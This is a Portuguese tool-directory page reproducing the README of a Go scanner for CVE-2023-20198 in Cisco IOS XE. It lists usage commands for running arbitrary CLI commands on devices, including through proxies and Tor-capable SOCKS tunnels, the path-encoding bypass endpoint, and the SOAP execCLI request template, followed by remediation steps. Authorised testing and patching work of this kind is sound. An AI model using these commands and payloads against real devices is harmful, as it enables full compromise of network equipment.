Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
cisco-cve-2023-20198-checker — Scanner de vulnerabilidades baseado em Go para detectar CVE-2023-20198 em dispositivos Cisco IOS XE. Testa interfaces SOAP/XML (WSMA) para execução remota de código com varredura em lote e geração de relatório HTML. | Kitploit
Ferramentas/GitHubGitHub/gustavorobertux/cisco-cve-2023-20198-checker
Scanners de VulnerabilidadesExploraçãoExploração de Aplicações WebSegurança de RedeTestes de PenetraçãoComando e Controle
GitHubgustavorobertux/cisco-cve-2023-20198-checker

cisco-cve-2023-20198-checker

Scanner de vulnerabilidades baseado em Go para detectar CVE-2023-20198 em dispositivos Cisco IOS XE. Testa interfaces SOAP/XML (WSMA) para execução remota de código com varredura em lote e geração de relatório HTML.

Ver Repositório
9há 6 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Cisco CVE-2023-20198 Checker

Go Version License Platform

Um scanner profissional de vulnerabilidades para detecção da CVE-2023-20198 em dispositivos Cisco IOS XE. Testa interfaces SOAP/XML vulneráveis (WSMA). Projetado para avaliações de segurança autorizadas e auditoria de rede.

⚠️ Aviso Legal

SOMENTE PARA TESTES DE SEGURANÇA AUTORIZADOS

Esta ferramenta é destinada exclusivamente a:

  • Varredura de vulnerabilidades autorizada
  • Auditorias de segurança com consentimento explícito por escrito
  • Avaliações de segurança de rede
  • Fins educacionais em ambientes de laboratório controlados
  • Testes de conformidade e penetração

Acesso não autorizado a sistemas de computador é ILEGAL. Sempre garanta que você possui a devida autorização antes de testar qualquer sistema.


🚀 Início Rápido

Instalação

Usando go install (Recomendado)

go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest

O binário será instalado no diretório $GOPATH/bin (geralmente ~/go/bin).

Instalação Manual

# Clone repository
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker

# Build
go build -o cisco-cve-2023-20198-checker

# Install (optional)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/

Uso Básico

# Check single target
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Check multiple targets
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin

# Generate HTML report
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html

📋 Recursos

  • ✅ Detecção de Vulnerabilidades - Testa a CVE-2023-20198 (RCE via WSMA)
  • ✅ Varredura de alvos únicos e em lote
  • ✅ Suporte a porta personalizada (padrão: 443)
  • ✅ Execução de comandos via SOAP/XML
  • ✅ Geração de relatório HTML profissional
  • ✅ Zero dependências externas
  • ✅ Multiplataforma (Linux, macOS, Windows)
  • ✅ Opção de ignorar certificado SSL/TLS
  • ✅ Timeouts configuráveis
  • ✅ Suporte a proxy (HTTP, HTTPS, SOCKS5)
  • ✅ Proxies autenticados
  • ✅ Suporte a variáveis de ambiente (HTTP_PROXY, HTTPS_PROXY)

🌐 Suporte a Proxy

Perfeito para ambientes corporativos! Suporta:

  • Proxies HTTP/HTTPS
  • Proxies SOCKS5 (túneis SSH, Tor)
  • Proxies autenticados
  • Variáveis de ambiente
# HTTP Proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# SOCKS5 (SSH tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Environment variable
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin

Consulte PROXY_GUIDE.md para configuração detalhada de proxy.


💻 Opções de Linha de Comando

FlagTypeDefaultDescrição
-targetstring-IP/hostname de destino único
-targets-filestring-Arquivo com alvos (um por linha)
-portint443Porta HTTPS/SOAP
-usernamestringadminNome de usuário SOAP
-passwordstring-Obrigatória. Senha SOAP
-commandstringuname -aComando a executar
-htmlboolfalseGerar relatório HTML
-timeoutint10Tempo limite da solicitação (segundos)
-skip-verifybooltrueIgnorar verificação SSL
-proxystring-URL do proxy (http://, https://, socks5://)

📖 Exemplos de Uso

Teste de Alvo Único

# Basic vulnerability check
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123

# Custom port
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret

# Execute specific command
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Generate report
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html

Teste em Lote

# Create targets file
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF

# Test all targets
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123

# Batch with HTML report
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html

Comandos Avançados

# Network enumeration
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show ip interface brief"

# Version detection
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -command "show version"

# Through HTTP proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://proxy.company.com:8080

# Through SOCKS5 proxy (SSH tunnel)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
  -proxy socks5://127.0.0.1:1080

# Authenticated proxy
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
  -proxy http://user:[email protected]:8080

🔧 Sobre a CVE-2023-20198

Detalhes da Vulnerabilidade

CVE ID: CVE-2023-20198
Pontuação CVSS: 10.0 (Crítica)
Tipo: Execução Remota de Código (RCE)
Afetados: Cisco IOS XE Web UI (WSMA)

Detalhes Técnicos

  • Endpoint: /%2577ebui_wsma_https (bypass de codificação de caminho)
  • Protocolo: SOAP 1.1 sobre HTTPS
  • Autenticação: WS-Security UsernameToken (credenciais válidas necessárias)
  • Namespace: urn:cisco:wsma-exec
  • Impacto: Comprometimento total do dispositivo com credenciais válidas

Estrutura da Solicitação SOAP

<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP:Header>
        <wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
            <wsse:UsernameToken>
                <wsse:Username>admin</wsse:Username>
                <wsse:Password>password</wsse:Password>
            </wsse:UsernameToken>
        </wsse:Security>
    </SOAP:Header>
    <SOAP:Body>
        <request xmlns="urn:cisco:wsma-exec">
            <execCLI>
                <cmd>COMMAND_HERE</cmd>
            </execCLI>
        </request>
    </SOAP:Body>
</SOAP:Envelope>

🛡️ Remediação

Para Administradores de Sistema

Se seus dispositivos estiverem vulneráveis:

1. Desative o WSMA (se não for necessário)

no ip http server
no ip http secure-server

2. Restrinja o acesso com ACLs

ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
  permit 10.0.0.0 0.0.0.255
  deny any log

3. Atualize o firmware - Aplique os patches de segurança mais recentes da Cisco

4. Habilite autenticação forte

aaa new-model
aaa authentication login default group tacacs+ local

5. Monitore os logs - Fique atento a atividades suspeitas de SOAP/HTTP


🏗️ Compilando a Partir do Código-Fonte

Pré-requisitos

  • Go 1.21 ou superior

Compilar

# Standard build
go build -o cisco-cve-2023-20198-checker

# Optimized (smaller binary)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker

# Cross-compile for different platforms
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1

📊 Exemplos de Saída

Baixar ferramenta